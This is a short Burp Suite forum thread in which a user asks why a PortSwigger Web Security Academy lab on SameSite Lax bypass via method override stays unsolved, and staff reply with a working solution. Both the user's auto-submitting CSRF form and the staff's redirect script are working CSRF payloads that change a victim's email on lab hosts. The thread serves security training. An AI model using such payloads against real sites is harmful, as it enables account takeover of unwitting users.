Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

the lab dont solve when i click on deliver exploit to victem but its all good dont know the problem

Eternal | Last updated: Oct 15, 2024 03:08PM UTC

<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <form action="https://0a93005703ada40c80ab71ad009c009d.web-security-academy.net/my-account/change-email" method="GET"> <input type="hidden" name="_method" value="POST"> <input type="hidden" name="email" value="Crack&#64;gmail&#46;com" /> <input type="submit" value="Submit request" /> </form> <script> document.forms[0].submit(); </script> </body> </html>

Michelle, PortSwigger Agent | Last updated: Oct 15, 2024 03:17PM UTC

Hi Can you please confirm the name of the lab you are currently working on?

Eternal | Last updated: Oct 15, 2024 04:38PM UTC

SameSite Lax bypass via method override

Ben, PortSwigger Agent | Last updated: Oct 16, 2024 07:56AM UTC

Hi, The following exploit, as added to the Body of the exploit server, allows me to solve the lab: <script> document.location = "https://0a8000840354eafe80f476eb00f60078.web-security-academy.net/my-account/change-email?email=pwned@web-security-academy.net&_method=POST"; </script>

Eternal | Last updated: Oct 16, 2024 12:43PM UTC